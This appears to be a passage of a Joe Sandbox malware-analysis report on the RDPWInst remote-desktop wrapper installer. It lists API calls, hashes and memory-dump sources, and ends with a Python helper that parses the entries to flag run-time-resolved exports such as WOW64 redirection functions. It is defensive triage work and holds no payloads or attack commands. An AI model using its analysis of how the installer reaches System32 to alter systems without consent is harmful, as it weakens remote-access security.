                                                                                • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
                                                                                • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                                                APIs
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                                                • VariantClear.OLEAUT32(?), ref: 004196EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                • String ID:
                                                                                • API String ID: 920484758-0
                                                                                • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                                                • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                • String ID:
                                                                                • API String ID: 3990497365-0
                                                                                • Opcode ID: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                • Instruction ID: 83055b0679be0c1ffa726a7bf1997f9f19e1454b2f4a6b728642dd338ff24854
                                                                                • Opcode Fuzzy Hash: b4db8f4b60a4758e302225d89cd2c63d37b5a2fd60e804dc2dc20906c96adb53
                                                                                • Instruction Fuzzy Hash: 80412070A003589FDB20EF59CC81BCAB7B9AB49304F0040FAE508E7251DB7A9E94CF59
                                                                                APIs
                                                                                • GetThreadUILanguage.KERNEL32(?,00000000), ref: 00408B19
                                                                                • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 00408B7B
                                                                                • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 00408BD8
                                                                                • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 00408C0B
                                                                                  • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,00408B89), ref: 00408ADB
                                                                                  • Part of subcall function 00408AC4: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,00408B89), ref: 00408AF8
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Thread$LanguagesPreferred$Language
                                                                                • String ID:
                                                                                • API String ID: 2255706666-0
                                                                                • Opcode ID: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                • Instruction ID: ba3eb85df9a642da38a4383696d7f270617e705f6d5ccbab9dd9f20305666083
                                                                                • Opcode Fuzzy Hash: 57ba5b2eaa9ba2f7f394178960eeeee68cc8fe68392739164dda0304afca2262
                                                                                • Instruction Fuzzy Hash: 5A317C70A1021A9BDB00DFE9C885AAEB3B5FF44304F00457AE991E72D1DB78AE44CB58
                                                                                APIs
                                                                                • FindResourceW.KERNEL32(00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000,?,0043CEE1), ref: 0042FB5F
                                                                                • LoadResource.KERNEL32(00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8,?,0044BFA8,00000000), ref: 0042FB79
                                                                                • SizeofResource.KERNEL32(00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000,0044BFA8), ref: 0042FB93
                                                                                • LockResource.KERNEL32(0042F774,00000000,00400000,0042FBE4,00400000,0042FBE4,00400000,00000000,?,00425E1C,00400000,00000001,00000000,?,0042FA36,00000000), ref: 0042FB9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                • Instruction ID: 2319d0df2cd87803d0a75df5626f4cddb48e3135002f19a9a4d545a6677a7621
                                                                                • Opcode Fuzzy Hash: 6ebdd4f1cd543b76a016c77fc1286a410c61f79913e5f64509fe1404532659ad
                                                                                • Instruction Fuzzy Hash: 49F06DB37012146F9745EEADA881D6B77FDEE88264390017FFA08D7202DA38ED154379
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00449C1C), ref: 0040A0F8
                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 0040A10E
                                                                                • LeaveCriticalSection.KERNEL32(00449C1C,00449C1C), ref: 0040A143
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeavelstrcmpi
                                                                                • String ID: YD
                                                                                • API String ID: 2420758022-4277794568
                                                                                • Opcode ID: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                • Instruction ID: abf7b61c1320a37f19f23f54b7b1c16b8e1f28cb69a34480c51c1f01e8ca554a
                                                                                • Opcode Fuzzy Hash: 0b44f2d380ec5fe545f4f2e3965f64519b1ec05f6d6c381fa1d4a9968702bb33
                                                                                • Instruction Fuzzy Hash: 8AF062322003145BEF106A619CC2B1677989F15714F100037FB007F2C3D6BC9C60466F
                                                                                APIs
                                                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405A9A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID: $$@
                                                                                • API String ID: 3192549508-1194432280
                                                                                • Opcode ID: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                • Instruction ID: fff674c7101e68f6d73d2d8a69124ddc370c84ad249f2bdacb9cff7d7fa155c1
                                                                                • Opcode Fuzzy Hash: ffbabee0d71fd2b7d8fc05915f2ca3a30f23b11c7e3ffcedbc7f052df7b7c5c2
                                                                                • Instruction Fuzzy Hash: 1C418C75304A019FD720DB14D884B2BB7A5EB89314F69867AF444AB392C738EC41CF69
                                                                                APIs
                                                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID: $$@
                                                                                • API String ID: 3192549508-1194432280
                                                                                • Opcode ID: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                • Instruction ID: 4b325d1a8302ad8f82e944498d23502563e7d009f61a8d4e6d3783212fd5e4e2
                                                                                • Opcode Fuzzy Hash: 23fdc1c80813b7a19c68f0c79cc3fa5e3fa91e7525bef4bca6a264e8681dbcfb
                                                                                • Instruction Fuzzy Hash: 533141B4604700EFD720DB10D888B6BBBA9EB84724F54857AF448A7291C738EC40CF69
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DateFormatLocaleThread
                                                                                • String ID:
                                                                                • API String ID: 3303714858-3916222277
                                                                                • Opcode ID: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                • Instruction ID: da40258a30b1bf54e866a7fbbaf5cc9082ba5d6ba5cf06b5a9e2a769468a01f6
                                                                                • Opcode Fuzzy Hash: 0d5b63d8b5d64c377b747a6270c18780734cafdd64312a6cbce0b29c00a6c7cf
                                                                                • Instruction Fuzzy Hash: 2C21BB31A04254AFC711DF64C8556EA77B5EF49300F4140A7FD45E72A1D6389E50C7AA
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32 ref: 00415102
                                                                                • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleMetricsSystemThread
                                                                                • String ID: p[D
                                                                                • API String ID: 3035471613-2202972244
                                                                                • Opcode ID: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                • Instruction ID: 0794bcb2409efff6a4af82a72d6dc306925be2e2831a755ee0de451743422fb7
                                                                                • Opcode Fuzzy Hash: da98f0b9cf3a04fcb2a289a8677121395d8df8e9f207d3304538472cbe0e1366
                                                                                • Instruction Fuzzy Hash: 4A010430A00650EADB129E6658813D27BD49B82315F48C0BBED489F387D63CD881C77A
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                                                  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                • API String ID: 1646373207-3689287502
                                                                                • Opcode ID: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                • Instruction ID: 7cbe884eb00d1b8f8e0b90a93abb1152f64afda344a6e4615680911855581588
                                                                                • Opcode Fuzzy Hash: 3a9063c87b9bf03a8dd6229c9438aece060355b6351e033b19066e162e83d57d
                                                                                • Instruction Fuzzy Hash: D4E012513883C21AD61276FA1DD2B2E26CC4B6D709F2C287FB5C0D1193D99DC468863F
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                                                  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                Strings
                                                                                Memory Dump Source
• Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 1646373207-1355242751
• Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
• Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
• Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
• Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
Strings
Memory Dump Source
• Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExW$kernel32.dll
• API String ID: 1646373207-1127948838
• Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
• Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
• Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
• Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D
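The two function entries above share the same API ID (AddressHandleModuleProc) and the same call pattern (GetModuleHandleW on kernel32.dll, then GetProcAddress in a subcall): the RDPWInst image resolves Wow64RevertWow64FsRedirection and GetDiskFreeSpaceExW at run time rather than through its import table. The first is the usual sign of a 32-bit installer that needs to write the native System32 (where termsrv.dll and the RDP wrapper DLL live) and then restore WOW64 redirection. The script below is an added triage helper written for this page; it is not part of the Joe Sandbox report or of RDPWrap. It parses the report's plain-text function entries into (snapshot, string IDs, API calls) records and lists which exports each function resolves dynamically. Assumptions: the `$` character joins multiple string IDs in a "String ID" field, the "API ID" token string is built from the called API names (Address, Handle, Module, Proc here), and the sample text is a constructed copy of the two entries above with the download widgets and indentation removed. The notes in `NOTABLE` are the editor's, not report output.

```python
"""Triage Joe Sandbox function-dump entries for dynamically resolved exports.

Added example for this page, not code from the report or from RDPWrap.
"""
import re
from dataclasses import dataclass, field

# Constructed input mirroring the two entries on the page ('$' is assumed to be
# the separator Joe Sandbox uses when a function matches several strings).
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 1646373207-1355242751
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
  • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
Strings
Memory Dump Source
• Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExW$kernel32.dll
• API String ID: 1646373207-1127948838
"""

# Editor's notes on exports worth a second look in an RDP-wrapper installer.
NOTABLE = {
    "Wow64DisableWow64FsRedirection": "32-bit process reaching the native System32",
    "Wow64RevertWow64FsRedirection": "restores WOW64 redirection after a native-System32 write",
    "GetDiskFreeSpaceExW": "free-space check, typical pre-install sanity test",
}

SECTIONS = {"Joe Sandbox IDA Plugin", "Yara matches", "Similarity", "APIs", "Strings"}
BULLET = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
CALL = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class FunctionEntry:
    snapshot: str = ""
    api_id: str = ""
    string_ids: list = field(default_factory=list)
    api_calls: list = field(default_factory=list)  # (api, module, args, ref)

    def modules(self):
        return [s for s in self.string_ids if s.lower().endswith(".dll")]

    def resolved_exports(self):
        """Export names the entry shows being looked up via GetProcAddress."""
        evidence = "AddressHandleModuleProc" in self.api_id or any(
            api == "GetProcAddress" for api, *_ in self.api_calls)
        if not evidence:
            return []
        return [s for s in self.string_ids if not s.lower().endswith(".dll")]


def parse_entries(text):
    """Split the report text at each 'Memory Dump Source' header into entries."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionEntry()
            entries.append(cur)
            section = None
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        call = CALL.search(line)
        if section == "APIs" and call:
            args = [a for a in call["args"].split(",") if a]
            cur.api_calls.append((call["api"], call["mod"], args, int(call["ref"], 16)))
            continue
        m = BULLET.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Snapshot File":
            cur.snapshot = val
        elif key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.string_ids = val.split("$")
    return entries


def triage(text):
    """One record per function: modules named, exports resolved, call sites."""
    report = []
    for e in parse_entries(text):
        names = e.resolved_exports()
        report.append({
            "snapshot": e.snapshot,
            "modules": e.modules(),
            "resolved": names,
            "notable": {n: NOTABLE[n] for n in names if n in NOTABLE},
            "call_refs": {api: ref for api, _mod, _args, ref in e.api_calls},
        })
    return report


if __name__ == "__main__":
    for rec in triage(SAMPLE_REPORT):
        print(rec["snapshot"], rec["modules"], rec["resolved"], rec["notable"])
```

Run it over a saved copy of the report's function section to get the full set of run-time-resolved names in one pass; a Wow64Disable/Revert pair together with file writes under System32 is the behaviour to correlate with the "Enables remote desktop connection" and "Creates files inside the system directory" signatures higher up in the report.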